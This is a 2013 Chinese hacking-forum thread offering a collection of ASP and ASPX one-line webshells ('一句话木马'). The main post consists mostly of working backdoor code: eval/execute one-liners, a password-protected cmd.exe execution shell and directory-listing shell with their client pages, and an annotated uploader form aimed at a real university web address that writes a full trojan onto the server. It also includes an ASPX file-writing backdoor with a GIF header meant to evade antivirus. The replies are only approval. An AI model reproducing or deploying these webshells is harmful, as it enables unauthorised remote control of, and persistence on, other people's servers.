搜索
查看: 4549|回复: 2

asp一句话

[复制链接]
smallyang 该用户已被删除
发表于 2013-10-24 09:13:04 | 显示全部楼层 |阅读模式
ASP一句话木马大全!

<%eval request("MH")%>

<%execute request("MH")%>

<%execute(request("MH"))%>

<%If Request("MH")<>"" Then Execute(Request("MH"))%>

<%if request ("MH")<>""then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>

<SCRIPT language=VBScript runat="server">execute request("MH")</SCRIPT>

<%@ Page Language="Jscript"%>

<%eval(Request.Item["MH"],"unsafe");%>

1 asp一句话木马  
一句话木马 服务器
带验证:
——————————————cmd.asp————————————————
<%
   if request("authkey")="pic16f873a" then
%>
       <textarea readonly cols=80 rows=25>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>
      </textarea>
<%
     end if
%>

带验证 客户端
——————————————cmd.html————————————————
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; CHARSET=utf8">
</HEAD>
<div align=center>
<FORM method=post name=frm target=_blank>
Host:<input type=text name=act size=65 value="http://">
<br>
<br>      
Cmd :<input type=text name=cmd size=65 value="cmd">
<br>
<br>  
<input type=hidden name=authkey value="pic16f873a">   
<Input name=Send
onclick="Javascipt:frm.action=document.frm.act.value;
            frm.submit();"
type=button value="Send Command">
</FORM>
</div>

目录浏览  

服务器端
_________________________________________
<%
if request("authkey")="pic16f873a" then
szPara = Request.Form("path")  
set shell=server.createobject("shell.application")  
set dir1=shell.namespace(szPara)
set diritems=dir1.items

for each iii in diritems
  response.write   iii.path & "<font color=blue>[" & iii.size &"]</font><br>"
next
end if
%>
_________________________________________
客户端
__________________________________________
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; CHARSET=utf8">
</HEAD>
<div align=center>
<FORM method=post name=frm target=_blank>
Host:<input type=text name=act size=65 value="http://">
<br>
<br>
Path:<input type=text name=path size=65 value="C:\">  
<br>
<br>
<input type=hidden name=authkey value="pic16f873a">  
<Input name=Send onclick="Javascipt:frm.action=document.frm.act.value;frm.submit();"
type=button value="Send Command">

</FORM>
</div>

一句话木马客户端源文件:

里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了
***********************************************************

<form action=http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp method=post>
//"action="后面是需要修改的以asp命名的数据库的提交地址
//这个标签的意思是建立一个表单 以post方式提交给连接http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp处理

<textarea name=value cols=120 rows=10 width=45>
//这里的value值根据服务端<%execute request("value")%>中value而设定
//可以自行修改成<%execute request("p")%>相应这里的value值也必须改为p

set lP=server.createObject("Adodb.Stream")//建立流对象,有了对象才可以使用它固有的属性和方法
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("joeving") //取得木马内容 参数joeving可以自己定义 但必须和下面的name=joeving相对应
lP.SaveToFile server.mappath("wei.asp"),2
//将木马内容以覆盖文件的方式写入wei.asp
//2就是已覆盖的方式,这里的wei.asp也是可以自己定义的,如定义成1.asp
//但和下面的response.redirect"wei.asp"中wei.asp的保持一致
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "wei.asp" //转向生成的wei.asp 和上面的wei.asp相对应,也就是你熟悉的asp木马登 陆界面
</textarea>
//这段程序的功能:利用插入到数据库文件的<%execute request("value")%>这段代码执行第一个textarea中的内容,并将添加的木马内容写入和指向wei.asp,这样就相当于在服务器上建立了个asp木马文件,这样就可以取得webshell了

<textarea name=joeving cols=120 rows=10 width=45>添入生成木马的内容/textarea><BR><center><br>
//这段标签是你用来添加木马内容用的

<input type=submit value=提交>
</form>

***********************************************************

//程序的主要框架是
<form>
<textarea></textarea>//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示
<textarea></textarea>//添加木马内容用的
</form>
其实都是些很简单的一些html和asp的知识,大家不妨自己写个自己的木马客户端~~~呵呵





<%@ Page language="c#" validateRequest=false %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD>
<title>by qq 4998978</title>
<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
<meta content="C#" name="CODE_LANGUAGE">
<meta content="JavaScript" name="vs_defaultClientScript">
<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
<script language="C#" runat="server">

void Page_Load(object sender, System.EventArgs e)
{
string strPath = Server.MapPath(".");
L3.Text = strPath;
}

void Button1_Click(object sender, System.EventArgs e)
{
try
{
System.IO.FileInfo fil = new System.IO.FileInfo(T1.Text);
System.IO.StreamWriter sw = fil.CreateText();
sw.Write(T2.Text);
sw.Flush();
sw.Close();
L4.Text = "文件保存成功!";
}

catch(Exception ex)
{
L4.Text = ex.Message;
}
}
</script>
</HEAD>
<body MS_POSITIONING="GridLayout">
<form id="Form1" method="post" runat="server">
<aspabel id="L1" style="Z-INDEX: 101; LEFT: 24px; POSITION: absolute; TOP: 96px" runat="server">本文件绝对路径:</aspabel>
<asp:TextBox id="T1" style="Z-INDEX: 102; LEFT: 144px; POSITION: absolute; TOP: 64px" runat="server"
Width="376px"></asp:TextBox>
<aspabel id="L2" style="Z-INDEX: 103; LEFT: 24px; POSITION: absolute; TOP: 64px" runat="server">文件保存路径:</aspabel>
<aspabel id="L3" style="Z-INDEX: 104; LEFT: 144px; POSITION: absolute; TOP: 96px" runat="server"
Width="584px"></aspabel>
<asp:TextBox id="T2" style="Z-INDEX: 105; LEFT: 24px; POSITION: absolute; TOP: 128px" runat="server"
Width="504px" Height="344px" TextMode="MultiLine"></asp:TextBox>
<asp:Button id="Button1" style="Z-INDEX: 106; LEFT: 424px; POSITION: absolute; TOP: 504px" runat="server"
Width="96px" Text="保存文件" OnClick="Button1_Click"></asp:Button>
<aspabel id="L4" style="Z-INDEX: 107; LEFT: 144px; POSITION: absolute; TOP: 24px" runat="server"
Width="432px"></aspabel></form>
</body>
</HTML>

保存为:XXX.aspx,这是aspx微型DIY后门,最前面的gif89a是我自己加的,是GIF文件头,可以躲避杀毒,如果你不想要,可以删除
专业回帖 该用户已被删除
发表于 2013-10-24 09:22:10 | 显示全部楼层
学习了,不错,讲的太有道理了
854955425 该用户已被删除
发表于 2013-10-24 09:33:50 | 显示全部楼层
帮帮顶顶!!
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表